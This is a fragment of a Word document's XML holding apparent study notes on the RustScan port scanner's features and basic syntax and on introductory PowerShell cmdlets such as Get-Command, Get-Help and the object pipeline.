        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF224AC" w14:textId="1A7D7ADC" w:rsidR="00B71D21" w:rsidRPr="0084205E" w:rsidRDefault="00B71D21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Low-level kernel networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADEFD19" w14:textId="3B10BB74" w:rsidR="00B71D21" w:rsidRPr="0084205E" w:rsidRDefault="00B71D21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Written in rust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF415EE" w14:textId="06494614" w:rsidR="00B71D21" w:rsidRPr="0084205E" w:rsidRDefault="00B71D21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Asynchronous scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441220AB" w14:textId="38AC945C" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00CC34B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>RustScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Scripting Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC466BC" w14:textId="3E01ABB4" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00CC34B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Python, Shell, Perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124E783" w14:textId="2208CFC2" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00CC34B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adaptive Outbound SYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47170AEF" w14:textId="3FBE22BC" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00CC34B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Custom Top Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47672D" w14:textId="400A0532" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00CC34B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Operating System Adaption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B763750" w14:textId="79C414B3" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00CC34B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Basic format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B0BC3" w14:textId="5D0CC122" w:rsidR="00CC34B0" w:rsidRPr="0084205E" w:rsidRDefault="00AF2EA8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rustscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -r ports -a &lt;target IP&gt; - - &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A1509" w14:textId="05A045EE" w:rsidR="00AF2EA8" w:rsidRPr="0084205E" w:rsidRDefault="00AF2EA8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-p” – port scanning, separate by commas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A75F0D" w14:textId="2851B192" w:rsidR="00AF2EA8" w:rsidRPr="0084205E" w:rsidRDefault="00AF2EA8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- - range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6115EDBA" w14:textId="2601670E" w:rsidR="00AF2EA8" w:rsidRPr="0084205E" w:rsidRDefault="00AF2EA8" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4AE233" w14:textId="6DE42C1F" w:rsidR="00AF2EA8" w:rsidRPr="0084205E" w:rsidRDefault="00704948" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – Hacking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="657D8BE2" w14:textId="493F6FA9" w:rsidR="00704948" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows Scripting Language and shell environment using .NET framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB778B" w14:textId="2CDA82B8" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Allows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to execute .NET functions directly from its shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5924D" w14:textId="524E70BF" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Most </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> commands, called cmdlets, are written in .NET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26482315" w14:textId="6A93D4B8" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">The output of cmdlets are objects, allowing outputs to be passed from one cmdlet to another – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454959F" w14:textId="12F373DD" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verb-noun format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0A98C" w14:textId="33B4FE05" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4181E294" w14:textId="770379DF" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common verbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B674F6E" w14:textId="77F97C72" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040B83F" w14:textId="22A237C5" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4C0EB" w14:textId="420BF369" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09916AB1" w14:textId="6C2210D7" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50CEF9" w14:textId="43395138" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F860D" w14:textId="77308CF4" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>New</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C59AA" w14:textId="6B0FE72A" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C282A" w14:textId="6BA55B1B" w:rsidR="00E1223B" w:rsidRPr="0084205E" w:rsidRDefault="00E1223B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B956C0" w14:textId="7AFD0C00" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C242F3" w14:textId="1BA6C104" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gets all cmdlets installed on current computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67477D2F" w14:textId="1F6814A3" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows for pattern matching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC6789" w14:textId="3FB31DC1" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-Command Verb-* or Get-Command *-Noun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55894F53" w14:textId="7C744FDF" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-Command New-*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529294E" w14:textId="21FFD19A" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>View all cmdlets for the verb “New”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21A56D" w14:textId="2BA8A165" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F445D94" w14:textId="17F322E2" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Displays information about a cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DE894" w14:textId="494443D3" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax. Get-Help &lt;Command-Name&gt; &lt;-Flag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B72EE6" w14:textId="6E18D5C3" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex, Get-Help Get-Command -Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CD8B5B" w14:textId="233C753C" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Object Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296221EA" w14:textId="454E3D80" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passing output to other cmdlets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A2A72" w14:textId="28F397FB" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using specific object cmdlets to extract information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A4A02" w14:textId="5AF1DF35" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Pipeline | used to pass output from one cmdlet to another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CC7CD" w14:textId="1CF62FAA" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> passes an object to the next cmdlet, as opposed to text or a string</w:t>
      </w:r>
    </w:p>
